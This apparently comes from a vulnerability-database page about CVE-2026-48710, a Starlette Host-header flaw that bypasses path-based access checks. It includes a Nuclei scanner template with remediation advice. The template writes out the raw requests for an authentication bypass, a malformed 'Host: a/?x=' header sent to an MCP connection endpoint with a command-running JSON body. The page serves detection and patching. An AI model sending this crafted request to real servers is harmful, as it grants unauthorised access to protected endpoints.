| Reporter | Title | Published | Views | Family All 72 |
|---|---|---|---|---|
| Exploit for CVE-2026-48710 | 28 May 202609:57 | – | githubexploit | |
| CVE-2026-48710 | 26 May 202621:54 | – | attackerkb | |
| CVE-2026-48710 | 26 May 202621:54 | – | alpinelinux | |
| The vulnerability of the Request Header Handler component of the ASGI framework in web development for Starlette allows attackers to circumvent existing security restrictions. | 28 May 202600:00 | – | bdu_fstec | |
| CVE-2026-48710 vulnerabilities | 13 Jun 202601:18 | – | cgr | |
| CVE-2026-48710 | 26 May 202607:49 | – | circl | |
| Starlette 环境问题漏洞 | 26 May 202600:00 | – | cnnvd | |
| CVE-2026-48710 | 26 May 202621:54 | – | cve | |
| CVE-2026-48710 Starlette has missing Host header validation that poisons request.url.path, bypassing path-based security checks | 26 May 202621:54 | – | cvelist | |
| [SECURITY] [DSA 6302-1] starlette security update | 27 May 202621:01 | – | debian |
id: CVE-2026-48710
info:
name: Starlette - Improper Validation of Unsafe Equivalence in Input
author: ritikchaddha
severity: critical
description: |
A flaw was found in Starlette, a lightweight ASGI (Asynchronous Server Gateway Interface) framework. A remote attacker could exploit this vulnerability by sending a specially crafted HTTP Host request header. This malformed header could cause the request.url to be incorrectly reconstructed, leading to a discrepancy with the actual requested path. Consequently, security restrictions enforced by middleware and endpoints that rely on request.url for validation could be bypassed, potentially allowing unauthorized access or actions.
impact: |
A remote attacker can exploit this vulnerability by sending a specially crafted HTTP Host header in a request to a Starlette-based application. Due to improper validation of the Host header, security restrictions that rely on request.url for enforcement may be bypassed. This allows attackers to gain unauthorized access to endpoints protected by middleware or path-based checks, potentially leading to privilege escalation, information disclosure, or unauthorized actions.
remediation: |
Upgrade Starlette to >= 1.0.1 to address this vulnerability.If immediate patching is not possible, implement strict Host header validation in a reverse proxy or web server (such as nginx or Apache) to only allow expected Host values, mitigating the risk of URL-based restriction bypass.
reference:
- https://github.com/Kludex/starlette/security/advisories/GHSA-86qp-5c8j-p5mr
- https://nvd.nist.gov/vuln/detail/CVE-2026-48710
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2026-48710
epss-score: 0.01438
epss-percentile: 0.69943
cwe-id: CWE-1289
metadata:
max-request: 2
vendor: Kludex
product: starlette
shodan-query: http.html:"starlette"
fofa-query: body="starlette"
tags: cve,cve2026,starlette,auth-bypass,badhost
flow: http(1) && http(2)
http:
- raw:
- |
POST /mcp-rest/test/connection HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"transport":"stdio","command":"echo","args":["test"]}
matchers:
- type: dsl
dsl:
- 'status_code == 401'
- 'contains_any(body, "auth_error", "Authentication Error")'
condition: and
internal: true
- raw:
- |
POST /mcp-rest/test/connection HTTP/1.1
Host: a/?x=
Content-Type: application/json
Content-Length: 54
{"transport":"stdio","command":"echo","args":["test"]}
unsafe: true
matchers-condition: and
matchers:
- type: word
words:
- "Failed to connect to MCP server"
- "status"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100ba60ecca9627bb5a0f0502b5b9e1e2e4b9c83f70f0bf8a9ee6c66549cc6f7b50022100ffe69df667f13bd0e5bcbdfab3b176a7660e91eeac89143f4e97cc2eb6dc6727:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation